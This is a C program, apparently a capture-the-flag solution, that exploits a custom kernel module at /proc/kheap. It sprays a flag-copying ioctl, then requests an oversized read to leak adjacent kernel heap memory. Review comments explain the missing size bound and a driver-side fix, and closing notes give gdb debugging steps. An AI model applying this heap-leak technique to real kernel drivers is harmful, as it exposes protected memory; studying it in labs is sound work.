#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
/*
 * Request codes passed as the second argument of ioctl() on /proc/kheap.
 * Written in hex and ordered by value; the numbers are unchanged.
 * NOTE(review): what each code does is defined by the driver, which is not
 * part of this file -- the meanings are only suggested by the names.
 * CMD_PRINT is not used by main() in this file.
 */
#define CMD_COPY_TO_USER   0x5700 /* 22272 */
#define CMD_COPY_FROM_USER 0x5701 /* 22273 */
#define CMD_PRINT          0x5702 /* 22274 */
#define CMD_COPY_FLAG      0x5704 /* 22276 */
/*
 * Argument record for the /proc/kheap ioctls; main() passes its address as
 * the third ioctl() argument.
 * NOTE(review): the field order and types presumably have to match the
 * driver's own definition, which is not visible here -- confirm before
 * reordering.
 */
struct kheap_req_t {
    void  *ubuf;  /* user-space buffer the request refers to */
    size_t size;  /* number of bytes requested for the transfer */
};
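/*
 * Drives the /proc/kheap ioctl interface in three steps and prints the result:
 *   1. CMD_COPY_FROM_USER with a 0x200-byte request, buf filled with '0';
 *   2. CMD_COPY_FLAG issued 0x1000 times with the same request;
 *   3. CMD_COPY_TO_USER with a 0x1000-byte request back into buf.
 * It then prints buf from offset 0x200 onward, i.e. whatever step 3 returned
 * beyond the 0x200 bytes supplied in step 1.
 *
 * NOTE(review): the driver is not part of this file. The notes at the end of
 * the file give a slot size of 0x200 bytes, so step 3 presumably returns
 * adjacent data only because the handler does not bound req.size by the slot
 * size; the driver-side mitigation would be to reject or clamp larger sizes
 * before copying -- confirm against the module source.
 *
 * Returns 0 on success, 1 if the device cannot be opened or a checked ioctl
 * fails.
 */
int main(void) {
    enum { BUF_LEN = 0x1000, SLOT_LEN = 0x200, FLAG_ROUNDS = 0x1000 };
    char buf[BUF_LEN];
    struct kheap_req_t req = {buf, SLOT_LEN};
    int rc = 1;

    /* Without a valid descriptor every later ioctl would fail with EBADF. */
    int fd = open("/proc/kheap", O_RDWR);
    if (fd < 0) {
        perror("open /proc/kheap");
        return 1;
    }

    memset(buf, '0', sizeof buf);
    if (ioctl(fd, CMD_COPY_FROM_USER, &req) < 0) {
        perror("ioctl CMD_COPY_FROM_USER");
        goto out;
    }

    /* Individual failures in this loop are ignored, as in the original. */
    for (int i = 0; i < FLAG_ROUNDS; i++) {
        (void)ioctl(fd, CMD_COPY_FLAG, &req);
    }

    req.size = sizeof buf;
    if (ioctl(fd, CMD_COPY_TO_USER, &req) < 0) {
        perror("ioctl CMD_COPY_TO_USER");
        goto out;
    }

    /*
     * buf may come back completely filled, with no NUL terminator, so a plain
     * "%s" could read past the end of the array. The precision caps the read
     * at the bytes remaining in buf; output still stops at the first NUL.
     */
    printf("%.*s", (int)(sizeof buf - SLOT_LEN), &buf[SLOT_LEN]);
    rc = 0;

out:
    close(fd);
    return rc;
}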
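// Debugging notes:
// $ sudo cat /proc/modules   (lists each loaded module with its load address, used in add-symbol-file below)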
// gdb> add-symbol-file /challenge/challenge1.ko 0xffffffffc0000000
// gdb> b kheap_open
// gdb> b kheap_ioctl
// A slot is 0x200 bytes.
// $ gcc exploit.c -o exploit